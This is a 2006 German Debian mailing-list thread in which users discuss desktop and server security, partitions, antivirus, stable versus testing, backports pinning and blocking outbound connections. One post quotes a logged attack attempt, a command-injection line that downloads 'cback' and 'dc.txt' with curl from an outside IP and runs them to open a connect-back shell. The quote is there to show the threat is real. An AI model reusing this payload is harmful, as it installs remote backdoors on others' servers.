Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Dienstag, 28. März 2006 00:45 schrieb Andrea Bayer: > [...] > Noch ne Frage, ich habe ziemlich stark partitioniert: wenn nun jemand > Zugang zu meinem Rechner fände, dann aber doch nur in der jeweiligen > Partition oder? Welches ist denn die jeweilige Partition? Der Angreifer knackt ja nicht eine Partition. Er bekommt es hin, als ein bestimmter Nutzer irgendwelchen Code ausführen zu lassen. Alles, was der bestimmte Nutzer mit diversen Partitionen machen kann, kann dann prinzipiell auch der Angreifer machen. Dieser bestimmte Nutzer kann natürlich im schlimmsten Fall root sein. root kann quasi beliebig auf die Laufwerke zugreifen, somit kann das der Angreifer auch, wenn er beliebigen Code als root ausführen kann. > Gruß > Andrea Viele Grüße Wolfgang
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo Andrea, Andrea Bayer, 28.03.2006 (d.m.y): > Am Samstag, 25. März 2006 17:17 schrieb Wolfgang Jeltsch: > > Allerdings muss man auch sagen, dass bei einem Desktop-Rechner hinter einer > > Firewall die Sicherheitsrisiken wohl nicht sehr hoch sind. Kriminellen, die ganze Botnetze an Spammer vermieten, ist _jeder_ Rechner lieb, der ueber eine halbwegs flotte Netzwanbindung verfuegt. > hm, wirklich ernsthafte Frage, wenn mir seit 1992 unter Windows nix passiert > ist, okay, mit entsprechenden Programmen, wie sehr bin ich dann Linux > gefährdeter. Prinzipiell genauso: Eine Kette haelt nur soviel aus wie ihr schwaechstes Glied. > Ich weiß ja nicht, wieviel Verlass auf ein Programm von Norton gegeben ist, Ich wuerde da nicht soooviel drauf geben... > dass mal vom einer Website teste, wie gefährdet man ist. Ich hatte da keine > Firewall installiert nur den Router laufen und Norton hat mir keine > Sicherheitslücken nachgewiesen. In diesem Falle hat die Webseite auch nicht Deinen Rechner, sondern den Router "abgeklopft". Durch den Router ist Dein Rechner naemlich schonmal nicht direkt aus dem Internet erreichbar - es sei denn, Du hast entsprechende "Portforwardings" konfiguriert. > Wie hoch ist die Wahrscheinlichkeit, das so > ein kleiner Desktop-PC auch größeres Interesse weckt. S.o. > Noch ne Frage, ich habe ziemlich stark partitioniert: wenn nun jemand Zugang > zu meinem Rechner fände, dann aber doch nur in der jeweiligen Partition oder? Nein. Dein System "ueberspannt" ja quasi alle Partitionen. Hat ein Angreifer erstmal den Root-Account gekapert, so ist nichts mehr vor ihm sicher. Gruss, Christian Schmidt -- Christian Schmidt | Germany No HTML Mails, please!
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Andreas Pakulat schrieb: > On 28.03.06 00:45:12, Andrea Bayer wrote: > >> Ich weiß ja nicht, wieviel Verlass auf ein Programm von Norton gegeben ist, >> dass mal vom einer Website teste, wie gefährdet man ist. Ich hatte da keine >> Firewall installiert nur den Router laufen und Norton hat mir keine >> Sicherheitslücken nachgewiesen. Wie hoch ist die Wahrscheinlichkeit, das so >> ein kleiner Desktop-PC auch größeres Interesse weckt. >> Ich würde Dir empfehlen mal einen Security Scan über die Seite von der c't zu machen. Das Ergebnis kann Dir u.U. helfen Dein System weiter abzudichten! http://www.heise.de/security/dienste/portscan/ Gruß Niels -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On 28.03.06 00:45:12, Andrea Bayer wrote: > Ich weiß ja nicht, wieviel Verlass auf ein Programm von Norton gegeben ist, > dass mal vom einer Website teste, wie gefährdet man ist. Ich hatte da keine > Firewall installiert nur den Router laufen und Norton hat mir keine > Sicherheitslücken nachgewiesen. Wie hoch ist die Wahrscheinlichkeit, das so > ein kleiner Desktop-PC auch größeres Interesse weckt. Wie gesagt wenn du gar keine Dienste ins Netz anbietest bist du relativ sicher. Was dir dann noch den Tag vermiessen koennte waeren Viren/Wuermer in Mails. > Noch ne Frage, ich habe ziemlich stark partitioniert: wenn nun jemand Zugang > zu meinem Rechner fände, dann aber doch nur in der jeweiligen Partition oder? Das kommt drauf an. Ein Angreifer versucht normalerweise irgendeinen lokalen Account wie z.B. den deines Users in die Finger zu bekommen. Dann kann er erstmal alles was der entsprechende User auch darf. Inklusive lesen aller nicht extra geschuetzten Daten. Ein weiteres Ziel ist dann meist mehr Rechte zu bekommen, also z.B. Zugang zum Root-Account. Wenn er den inne hat kann er alles machen, inklusive saemtliche Spuren zu verwischen so dass du gar nicht mitbekommst das er da war. Dann faellt dir vllt. auch nie auf dass jemand alle deine Tastatureingaben mitliest... Allerdings setzt sowas immer eine bestehende remote-ausnutzbare Sicherheitsluecke vorraus. Die kann natuerlich auch darin bestehen dass man unvorsichtigerweise ein per Mail empfangenes Programm ausfuehrt... Andreas -- You will receive a legacy which will place you above want. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Samstag, 25. März 2006 17:17 schrieb Wolfgang Jeltsch: > Allerdings muss man auch sagen, dass bei einem Desktop-Rechner hinter einer > Firewall die Sicherheitsrisiken wohl nicht sehr hoch sind. Grüß Dich Wolfgang, hm, wirklich ernsthafte Frage, wenn mir seit 1992 unter Windows nix passiert ist, okay, mit entsprechenden Programmen, wie sehr bin ich dann Linux gefährdeter. Ich weiß ja nicht, wieviel Verlass auf ein Programm von Norton gegeben ist, dass mal vom einer Website teste, wie gefährdet man ist. Ich hatte da keine Firewall installiert nur den Router laufen und Norton hat mir keine Sicherheitslücken nachgewiesen. Wie hoch ist die Wahrscheinlichkeit, das so ein kleiner Desktop-PC auch größeres Interesse weckt. Noch ne Frage, ich habe ziemlich stark partitioniert: wenn nun jemand Zugang zu meinem Rechner fände, dann aber doch nur in der jeweiligen Partition oder? Gruß Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Samstag, 25. März 2006 19:21 schrieb Ulrich Fürst: > Stephen Ois <[EMAIL PROTECTED]> wrote: > > Also ich weiß nicht was es immer gegen Unstable und Testing gibt. > > Ich habe vor 1 1/2 Jahren mit Linux angefangen und nachdem ich 2 Tage > > Suse getestet hatte, habe ich Debian SID installiert. > > Du vllt. nicht, ich schon: > Als ich mit Debian angefangen habe, kannte ich nur Windows und DOS, > wenig Kenntnisse für scripte unter DOS und hatte ein paar Programme in > Turbo Pascal geschrieben. So, ich melde mich zurück ;) Inzwischen habe ich auf diesem Rechner beides, sowohl stable als auch testing. Unter testing habe ich jedenfalls Dauermurks mit dem Sound in sämtlichen Konfigurationen: mit ALSA ohne ALSA, der xmms-Equalizer kriegt auch eindeutig was, nur kommt kein Ton aus den Lautsprechern auch keine Signaltöne abgesehen vom PC-Lautsprecher. Ja, ich habe auch die Stummschaltung via Mixer herausgenommen. Unter stable, hab ich überhaupt keine Probleme mit dem Sound. Ich hab diesbezüglich wie wild gegoogelt gehabt, aber ein richtiges How To zur Behebung dieses vielfältig auftretenden Phänomens finde ich nicht. Will ich also zur Zeit Musik fahr ich stable hoch und zum Herumspielen nehm ich testing *g* Bin einfach mit meinem Latein am Ende diesbezüglich. Gruß Andrea
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo Wolfgang, Wolfgang Jeltsch, 25.03.2006 (d.m.y): > Am Freitag, 24. März 2006 09:56 schrieb Christian Frommeyer: > > [...] > > > Ein Anti-Viren-Programm kann nicht schaden und gehört meiner Meinung > > nach auch auf jeden Linux-Rechner. > > Uff, da bin ich wohl in diesem Punkt völlig hinterm Mond. Könntest du > vielleicht kurz erklären, wo bei Linux reale Risiken für Virenbefall liegen? Die Tatsache, dass es momentan noch keine Viren fuer Linux gibt, ist leider kein Garant dafuer, dass es morgen auch noch so ist. Hinzu kommt, dass man auch nicht unwissentlich zur Verbreitung von Malware fuer andere Systeme beitragen moechte, weshalb zumindest auf dem Mailserver ein Virenscanner IMO schon seine Daseinsberechtigung hat. Gruss, Christian Schmidt -- Wenn die Sonne der Kultur niedrig steht, werfen selbst Zwerge einen Schatten. -- Karl Kraus signature.asc Description: Digital signature
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Hallo Thomas, Thomas Antepoth, 25.03.2006 (d.m.y): > On Sat, 25 Mar 2006, Wolfgang Jeltsch wrote: > > > Damals erkundigte ich mich auf dieser Liste, was ich am besten machen > > sollte, > > und mir wurde gesagt, dass es unsinnig ist, Zugriffe auf Ports, die sowieso > > nicht offen sind, noch durch einen Filter zu verhindern. > > Und die offenen Ports will ich ja nicht blockieren. Mit anderen Worten: > > auf einem Server, der direkt mit dem Internet verbunden ist, braucht man > > keinen Paketfilter. (So habe ich das jedenfalls verstanden.) > > Es wird immer wieder vergessen, daß es auch sog. "Connectback"-Shells > gibt. D.h. ein von außen erlaubter Dienst wird dazu gebracht, daß er auf > einem beliebigen anderen Port mit einer connectback-shell > zurück-connected. Und die macht dann *wirkliche* Swinigeleien. > > Somit folgt, daß auch ausgehende Connections auf das unbedingt notwendige > Maß zurückgestutzt werden sollten, will man die Angriffsvektoren so klein > wie möglich halten. > > Was braucht man ausgehend? > > ftp Debian-Mirror > dns root/forwarder > smtp any > ident any > > Alles andere sollte gesperrt sein. > > Damit laufen dann auch die cback-Dinger ins Leere. Es sei denn, sie laufen ueber einen freigegebenen Port. ;-) Gruss, Christian Schmidt -- Was ich weiß, kann jeder wissen. Mein Herz habe ich allein. -- Johann Wolfgang von Goethe signature.asc Description: Digital signature
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Samstag 25 März 2006 17:23 schrieb Wolfgang Jeltsch: > Uff, da bin ich wohl in diesem Punkt völlig hinterm Mond. Könntest du > vielleicht kurz erklären, wo bei Linux reale Risiken für Virenbefall > liegen? Gibt es Backports mit Viren? (Kann ich mir schwer Naja ich denke genau jetzt gibt es wahrscheinlich kein großes Risiko, aber ich mache ja auch jetzt ein Backup, obwohl meine HD noch tut (und auch nicht den Anschein macht, als ob sie in der nächsten Zeit ausfällt). Gruß Chris -- A: because it distrupts the normal process of thought Q: why is top posting frowned upon
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Sonntag, 26. März 2006 05:51 schrieb Thomas Antepoth: > [...] Hallo, danke erstmal für die Infos! > > Und wie verhindere ich die ausgehenden Verbindungen? Ist es okay, > > mittels billiger iptables-Regeln (also Regeln, die kein > > Connection-Tracking benutzen) alle ausgehenden TCP- und UDP-Pakete, die > > nicht an bestimmte Ports, wie z.B. 25, gehen, abzublocken? > > Man setzt die drei Chains INPUT/OUTPUT/FORWARD erst einmal auf REJECT oder > DROP (die unhöflichere Variante) > > Damit ist dann erst mal alles verboten, was nicht durch eine andere Regel > erlaubt ist. Anschließend werden Regeln in die Ketten eingefügt. Mir ging es darum, ob man zum Verhindern von Connect-Back-Geschichten Connection-Tracking benutzt oder nicht und, falls nicht, nach welchem Kriterium man sperrt, also z.B. ob man nur nach Zielport sperrt oder auch irgendwelche Flags berücksichtigt oder was auch immer. > [...] Viele Grüße Wolfgang
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On Sat, 25 Mar 2006, Wolfgang Jeltsch wrote: > > Sowohl als auch. Sobald jemand auf deinem System Programme seiner Wahl > > ausführen kann, hast Du ziemlich wahrscheinlich verloren. > Wenn jemand auf meinem System Programme seiner Wahl ausführen kann, dann kann > er doch eben Programme seiner Wahl ausführen. Wieso muss er sich dafür noch > zurückverbinden? Ja - aber er kann zwar Programme ausführen, hat keine Rückmeldung bzw. keine interaktivität bzw. eine schlechte und unflexible Parametrisierung seiner Programme und die eingeschleusten Programme. Wieso werden Server gebrochen? Weil irgendjemand fremde: 1.) Netzwerkressourcen z.B. Spam, Warez, Angriffssprungbrett 2.) CPU-Ressourcen z.B. Numbercruncher f. Privkey-Bruteforcing, Hashcracker, CC-Pins mit entsprechendem Schwerpunkt auf 1 oder 2 nutzen möchte. Keine Rückmeldung bedeutet aber auch keine unmittelbare Nutzbarkeit der gebrochenen Maschine für den Angreifer da die unmittelbare Steuerbarkeit der Maschine fehlt und man die eingeschleusten Programme i.d.R. nur schlecht parametrisieren kann. > > Man macht ein System von außen so dicht wie es nur geht und läßt aber im > > Gegenzug sämtliche ausgehenden Connections zu. > Und wie verhindere ich die ausgehenden Verbindungen? Ist es okay, > mittels billiger iptables-Regeln (also Regeln, die kein > Connection-Tracking benutzen) alle ausgehenden TCP- und UDP-Pakete, die > nicht an bestimmte Ports, wie z.B. 25, gehen, abzublocken? Man setzt die drei Chains INPUT/OUTPUT/FORWARD erst einmal auf REJECT oder DROP (die unhöflichere Variante) Damit ist dann erst mal alles verboten, was nicht durch eine andere Regel erlaubt ist. Anschließend werden Regeln in die Ketten eingefügt. Die Verhinderung von ausgehenden Connections ist nur zur Begrenzung des Schadens und zur Minimierung der Angriffsvektoren, ähnlich wie dem noexec-gemountetem /tmp. Beide Methoden lassen sich leicht umgehen - aber sie verhindern erfolgreich mit wenig Aufwand das Durchkommen der dicksten Brocken. > > Der Logfile-Ausschnitt sollte nur zeigen, daß die Bedrohung nicht nur > > hypothetisch ist. > Wie ist in diesem Fall der Einbruch abgelaufen? Garnicht - es blieb beim Versuch. :-) Zumindest hat snoopy keine Ausführung irgendeines Programmes angezeigt. Aber man kann's auch nicht oft genug sagen: Vorderste Priorität hat in jedem Fall das Verhindern der wahlfreien Ausführung bzw. das Verhindern des wahlfreien Zugriffs der eingeschleusten Programme auf irgendwelche Daten. Momentan existiert eine Monokultur der erlaubten ausgehenden Verbindungen, weil diese als unschädlich betrachtet werden. Ich wollte nur noch einmal darauf aufmerksam machen, daß dem nicht so ist. t++
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On 25.03.06 21:57:44, Wolfgang Jeltsch wrote: > Am Samstag, 25. März 2006 18:09 schrieb Andreas Pakulat: > > On 25.03.06 17:20:36, Wolfgang Jeltsch wrote: > > [...] > > > > Wieso braucht man für Backports Pinning? Die Backports haben neuere > > > Versionen und werden daher gegenüber den sarge-Versionen bevorzugt. > > > > Genau deswegen. Nicht jeder will unbedingt alle Backports von bpo, manch > > einer will vllt. nur einen oder zwei. Dann hast du ohne Pinning ein > > Problem, deswegen sollte man einen Pin auf 200 oder so fuer bpo > > festlegen. Sobald man dann eine bpo-Version installiert hat bleibt man > > bei dieser und ihren Nachfolgern. > > Als ich das letzte Mal mit backports.org arbeitete (zu woody-Zeiten), konnte > man explizit angeben, welche Backports man haben will. Das ging ungefähr so: > > deb http://www.backports.org/debian stable > > Dabei stehen bis für Verzeichnisse auf dem Server, die > gewissen Paketgruppen entsprechen. Ich denke das hat sich mittlerweile geaendert. bpo verhaelt sich wie ein Debian-Mirror, nur das die Pakete neuer sind und die Release-Dateien andere Infos enthalten. Deswegen ist Pinning eigentlich fast schon Pflicht. Auf jedenfall steht die korrekte Vorgehensweise auf www.backports.org. Andreas -- Is this really happening? -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Samstag, 25. März 2006 18:09 schrieb Andreas Pakulat: > On 25.03.06 17:20:36, Wolfgang Jeltsch wrote: > [...] > > Wieso braucht man für Backports Pinning? Die Backports haben neuere > > Versionen und werden daher gegenüber den sarge-Versionen bevorzugt. > > Genau deswegen. Nicht jeder will unbedingt alle Backports von bpo, manch > einer will vllt. nur einen oder zwei. Dann hast du ohne Pinning ein > Problem, deswegen sollte man einen Pin auf 200 oder so fuer bpo > festlegen. Sobald man dann eine bpo-Version installiert hat bleibt man > bei dieser und ihren Nachfolgern. > > Andreas Als ich das letzte Mal mit backports.org arbeitete (zu woody-Zeiten), konnte man explizit angeben, welche Backports man haben will. Das ging ungefähr so: deb http://www.backports.org/debian stable Dabei stehen bis für Verzeichnisse auf dem Server, die gewissen Paketgruppen entsprechen. Viele Grüße Wolfgang
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Samstag, 25. März 2006 18:11 schrieb Thomas Antepoth: > On Sat, 25 Mar 2006, Wolfgang Jeltsch wrote: > > > Es wird immer wieder vergessen, daß es auch sog. "Connectback"-Shells > > > gibt. D.h. ein von außen erlaubter Dienst wird dazu gebracht, daß er > > > auf einem beliebigen anderen Port mit einer connectback-shell > > > zurück-connected. Und die macht dann *wirkliche* Swinigeleien. > > > > Verstehe ich noch nicht so ganz. Meinst du den Fall, dass der auf meinem > > Server installierte Dienst ganz ,,legal" zur Rückkonnektierung gebracht > > wird. > > Sowohl als auch. > > Nehmen wir mal an, Du hast einen SQL-Server mit der Möglichkeit > stored-procedures auf ihm auszuführen, hinter einer von außen abweisenden > Firewall, die z.B. den Port 1433 ;-) von außen nicht zuläßt. > > Schafft es nun jemand, dem SQL-Server "irgendwie" ein "cmd.exe" ;-) > unterzujubeln, das auf einem beliebigen Port zurückconnected, ist der > Bösling "drin" und kann dann als User, der den SQL-Server gestartet hat, > wirken wie er will und durch eine lokale Privilegien-Eskalation den > Rechner brechen. Ich glaube, ich verstehe zumindest so ungefähr, worauf du hinaus willst. (Das ist jetzt nicht als Kritik an deiner Erklärfähigkeit zu verstehen.) > > oder dass da bereits ein Sicherheitsloch im Dienst ausgenutzt wird? > > Sowohl als auch. Sobald jemand auf deinem System Programme seiner Wahl > ausführen kann, hast Du ziemlich wahrscheinlich verloren. Wenn jemand auf meinem System Programme seiner Wahl ausführen kann, dann kann er doch eben Programme seiner Wahl ausführen. Wieso muss er sich dafür noch zurückverbinden? > [...] > Man macht ein System von außen so dicht wie es nur geht und läßt aber im > Gegenzug sämtliche ausgehenden Connections zu. Und wie verhindere ich die ausgehenden Verbindungen? Ist es okay, mittels billiger iptables-Regeln (also Regeln, die kein Connection-Tracking benutzen) alle ausgehenden TCP- und UDP-Pakete, die nicht an bestimmte Ports, wie z.B. 25, gehen, abzublocken? > [...] > Der Logfile-Ausschnitt sollte nur zeigen, daß die Bedrohung nicht nur > hypothetisch ist. Wie ist in diesem Fall der Einbruch abgelaufen? > t++ Viele Grüße Wolfgang
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Stephen Ois <[EMAIL PROTECTED]> wrote: > > Also ich weiß nicht was es immer gegen Unstable und Testing gibt. > Ich habe vor 1 1/2 Jahren mit Linux angefangen und nachdem ich 2 Tage > Suse getestet hatte, habe ich Debian SID installiert. > > Ich hatte nie große Probleme mit meinem Linux und es läuft seit dieser > Zeit sehr stabil. OK, hin und wieder gibt es nach nem update das ein > oder andere Problem. Ich hatte aber noch nie welche, die nicht > innerhalb kürzester Zeit zu lösen waren. Deshalb sehe ich keinen Grund > für ein Desktopsystem Testing oder Unstable zu nutzen. Du vllt. nicht, ich schon: Als ich mit Debian angefangen habe, kannte ich nur Windows und DOS, wenig Kenntnisse für scripte unter DOS und hatte ein paar Programme in Turbo Pascal geschrieben. Und da war ich mit den Problemen der Konfiguration völlständig aus- (oder eher über-) lastet. Wären da noch Probleme im Packetmanagement aufgetaucht, wäre das der GAU gewesen. Ulrich
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On 25.03.06 17:05:59, Stephen Ois wrote: > Andreas Pakulat schrieb: > > Naja, wenn du aber einen neuen Rechner aufsetzt nimm bitte Sarge, > > wenn du hier und da doch was neueres _unbedingt_ brauchst weil da ein > > Feature drin ist ohne das du nicht leben kannst such dir einen Backport, > > www.backports.org ist da eine gute Anlaufstelle - dort gibts > > hochqualitative Backports. > Also ich weiß nicht was es immer gegen Unstable und Testing gibt. Ich > habe vor 1 1/2 Jahren mit Linux angefangen und nachdem ich 2 Tage Suse > getestet hatte, habe ich Debian SID installiert. Glueck gehabt. Im Ernst in den letzten 2 Jahren gabs tatsaechlich nicht allzuviele grobe Schnitzer. Das garantiert dir aber nicht das das immer so ist. > Ich hatte nie große Probleme mit meinem Linux und es läuft seit dieser > Zeit sehr stabil. Das mag ja sein, aber nicht jeder hat Zeit oder Lust sich mit diesen kleinen Probleme zu beschaeftigen. Und wenn man nichtmal weiss was APT ist (aka grad anfaengt) dann ist es auch nicht so leicht die kleinen Probleme zu beseitigen. > OK, hin und wieder gibt es nach nem update das ein > oder andere Problem. Ich hatte aber noch nie welche, die nicht > innerhalb kürzester Zeit zu lösen waren. Deshalb sehe ich keinen Grund > für ein Desktopsystem Testing oder Unstable zu nutzen. Wenn man seine Tools beherrscht oder gewillt ist Zeit in das Kennenlernen derselben zu investieren, ohne uns hier gleich bei jedem Problem mit Fragen zu ueberhaeufen, dann spricht tatsaechlich nicht viel dagegen. Aber Anfaenger mit Linux, insbesondere nicht-Informatiker, tun sich oft bereits schwer genug ueberhaupt mit dem System klarzukommen, geschweige denn mit synaptic, apt und Co irgendwelche Abhaengigkeitsprobleme, Dateien aus 2 Paketen die gleichzeitig installiert werden sollen, kaputte post|preinst|rm Skripte oder sonstwelche "kleinen" Problem zu beseitigen. Aus diesem Grund werde ich auch weiterhin Anfaengern empfehlen stable einzusetzen. Auch Leuten die den Anschein erwecken mit Testing/Unstable ueberfordert zu sein werde ich darauf hinweisen das man mit stable weniger Probleme hat, oder aber eine andere Debianbasierte Distri empfehlen (fuer den Desktop). > Und wenn es doch einmal Probleme gibt hat jeder user dem seine Daten > wichtig sind entsprechende Sicherungen... ;-) Hier kommt wieder der Zeitfaktor ins Spiel, nicht jeder will alle paar Monate wegen einem kaputten Paket sein System neu zu installieren. Andreas -- You'll never be the man your mother was! -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On Sat, 25 Mar 2006, Wolfgang Jeltsch wrote: > > Es wird immer wieder vergessen, daß es auch sog. "Connectback"-Shells > > gibt. D.h. ein von außen erlaubter Dienst wird dazu gebracht, daß er > > auf einem beliebigen anderen Port mit einer connectback-shell > > zurück-connected. Und die macht dann *wirkliche* Swinigeleien. > > Verstehe ich noch nicht so ganz. Meinst du den Fall, dass der auf meinem > Server installierte Dienst ganz ,,legal" zur Rückkonnektierung gebracht > wird. Sowohl als auch. Nehmen wir mal an, Du hast einen SQL-Server mit der Möglichkeit stored-procedures auf ihm auszuführen, hinter einer von außen abweisenden Firewall, die z.B. den Port 1433 ;-) von außen nicht zuläßt. Schafft es nun jemand, dem SQL-Server "irgendwie" ein "cmd.exe" ;-) unterzujubeln, das auf einem beliebigen Port zurückconnected, ist der Bösling "drin" und kann dann als User, der den SQL-Server gestartet hat, wirken wie er will und durch eine lokale Privilegien-Eskalation den Rechner brechen. > oder dass da bereits ein Sicherheitsloch im Dienst ausgenutzt wird? Sowohl als auch. Sobald jemand auf deinem System Programme seiner Wahl ausführen kann, hast Du ziemlich wahrscheinlich verloren. Bei den cback-Shells geht's erst mal nur um Schadensbegrenzung durch Wegnehmen eines Angriffsvektors indem man verhindert, daß der erste Schaden (das wahlfreie Ausführen als unterprivilegierter User) zu einem noch höheren (dem local root-exploit durch externe Beeinflussung) führt. Zuallererst gehört aber natürlich, daß das wahlfreie, anonyme Ausführen verhindert wird. > Solche Sicherheitslöcher könnten natürlich auch ohne Back-Connecting > negative Konsequenzen haben. Und was sind die genauen Probleme mit > Back-Connecting? Daß man sie stets vergisst und daß fast jeder erst mal so denkt... :-) Man macht ein System von außen so dicht wie es nur geht und läßt aber im Gegenzug sämtliche ausgehenden Connections zu. Jeder denkt erst mal so. Und das wird gerne ausgenutzt. Der Logfile-Ausschnitt sollte nur zeigen, daß die Bedrohung nicht nur hypothetisch ist. t++
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On 25.03.06 17:20:36, Wolfgang Jeltsch wrote: > Am Freitag, 24. März 2006 21:58 schrieb Andreas Pakulat: > > [...] > > > > Muss ich mir auch anschauen. Ich seh schon, dass wird wieder eine > > > Nachttour. > > > > Naja, da gehste du hin guckst dir in der FAQ an wie man die Eintraege in > > der sources.list und das APT-Pinning dafuer macht und gut ist. > > Wieso braucht man für Backports Pinning? Die Backports haben neuere Versionen > und werden daher gegenüber den sarge-Versionen bevorzugt. Genau deswegen. Nicht jeder will unbedingt alle Backports von bpo, manch einer will vllt. nur einen oder zwei. Dann hast du ohne Pinning ein Problem, deswegen sollte man einen Pin auf 200 oder so fuer bpo festlegen. Sobald man dann eine bpo-Version installiert hat bleibt man bei dieser und ihren Nachfolgern. Andreas -- Fine day to work off excess energy. Steal something heavy. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Samstag, 25. März 2006 17:25 schrieb Thomas Antepoth: > [...] > Es wird immer wieder vergessen, daß es auch sog. "Connectback"-Shells > gibt. D.h. ein von außen erlaubter Dienst wird dazu gebracht, daß er auf > einem beliebigen anderen Port mit einer connectback-shell > zurück-connected. Und die macht dann *wirkliche* Swinigeleien. Verstehe ich noch nicht so ganz. Meinst du den Fall, dass der auf meinem Server installierte Dienst ganz „legal“ zur Rückkonnektierung gebracht wird oder dass da bereits ein Sicherheitsloch im Dienst ausgenutzt wird? Solche Sicherheitslöcher könnten natürlich auch ohne Back-Connecting negative Konsequenzen haben. Und was sind die genauen Probleme mit Back-Connecting? > [...] Viele Grüße Wolfgang
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On Sat, 25 Mar 2006, Wolfgang Jeltsch wrote: > Damals erkundigte ich mich auf dieser Liste, was ich am besten machen sollte, > und mir wurde gesagt, dass es unsinnig ist, Zugriffe auf Ports, die sowieso > nicht offen sind, noch durch einen Filter zu verhindern. > Und die offenen Ports will ich ja nicht blockieren. Mit anderen Worten: > auf einem Server, der direkt mit dem Internet verbunden ist, braucht man > keinen Paketfilter. (So habe ich das jedenfalls verstanden.) Es wird immer wieder vergessen, daß es auch sog. "Connectback"-Shells gibt. D.h. ein von außen erlaubter Dienst wird dazu gebracht, daß er auf einem beliebigen anderen Port mit einer connectback-shell zurück-connected. Und die macht dann *wirkliche* Swinigeleien. Somit folgt, daß auch ausgehende Connections auf das unbedingt notwendige Maß zurückgestutzt werden sollten, will man die Angriffsvektoren so klein wie möglich halten. Was braucht man ausgehend? ftp Debian-Mirror dns root/forwarder smtpany ident any Alles andere sollte gesperrt sein. Damit laufen dann auch die cback-Dinger ins Leere. So sehen die cback-Shells dann aus, wenn sie in die access_log pippeln: 216.63.146.236 - - [06/Mar/2006:23:26:52 +0100] "2.90 8081;cd /var/tmp;curl -o cback http: //216.99.218.183/cback;chmod 744 cback;./cback 217.160.242.90 8081;curl -o dc.txt http://2 16.99.218.183/dc.txt;chmod 744 dc.txt;perl dc.txt 217.160.242.90 8081`;echo '_end_';exit;/ *" 400 371 "-" "-" t++
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 09:56 schrieb Christian Frommeyer: > [...] > Ein Anti-Viren-Programm kann nicht schaden und gehört meiner Meinung > nach auch auf jeden Linux-Rechner. Uff, da bin ich wohl in diesem Punkt völlig hinterm Mond. Könntest du vielleicht kurz erklären, wo bei Linux reale Risiken für Virenbefall liegen? Gibt es Backports mit Viren? (Kann ich mir schwer vorstellen.) Ist es wirklich realistisch, dass bei der Anzeige einer HTML-Mail mit KMail ein Virus das System infiziert? Oder woran denkst du? Eventuell kannst du mich ja auch auf einen Artikel o.ä. zu diesem Thema verweisen. > [...] Viele Grüße Wolfgang
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 21:58 schrieb Andreas Pakulat: > [...] > > Muss ich mir auch anschauen. Ich seh schon, dass wird wieder eine > > Nachttour. > > Naja, da gehste du hin guckst dir in der FAQ an wie man die Eintraege in > der sources.list und das APT-Pinning dafuer macht und gut ist. Wieso braucht man für Backports Pinning? Die Backports haben neuere Versionen und werden daher gegenüber den sarge-Versionen bevorzugt. Scheint bei mir jedenfalls zu klappen. > [...] Viele Grüße Wolfgang
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
Am Freitag, 24. März 2006 15:36 schrieb Andrea Bayer: > [...] > vermutlich bin ich noch zu windows-geprägt. Etch wird ja xorg und nicht > mehr xfree enthalten, deswegen will ich kein aussterbendes System bauen, > weil ich mir die Komination von x-window-server + xorg/xfree vorstelle wie > den Unterschied von Win98 auf WinXP, vermutlich lieg ich damit falsch. X.org is einfach die richtig freie Weiterentwicklung des nach Version 4.3 etwas unfreier gewordenen XFree86. Es ist also praktisch so, dass du mit X.org eine neuere Version von XFree86 hast. Mit XFree86 setzt du damit keinesfalls auf ein aussterbendes System, es lebt ja bei Debian und anderen Distributionen als X.org weiter. :-) > Ich bleib jetzt bei der testing-Version und werde nicht updaten, was stabil > läuft und bislang habe ich nirgendwo Probleme. Und was machst du mit den Sicherheitslücken, die es da sicher gibt? Sicherheitslücken werden in stable und unstable beseitigt. testing erhält die Fixes nur, wenn neue Pakete von unstable kommen, und das kann teilweise beträchtlich dauern. Allerdings muss man auch sagen, dass bei einem Desktop-Rechner hinter einer Firewall die Sicherheitsrisiken wohl nicht sehr hoch sind. > [...] Viele Grüße Wolfgang
Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
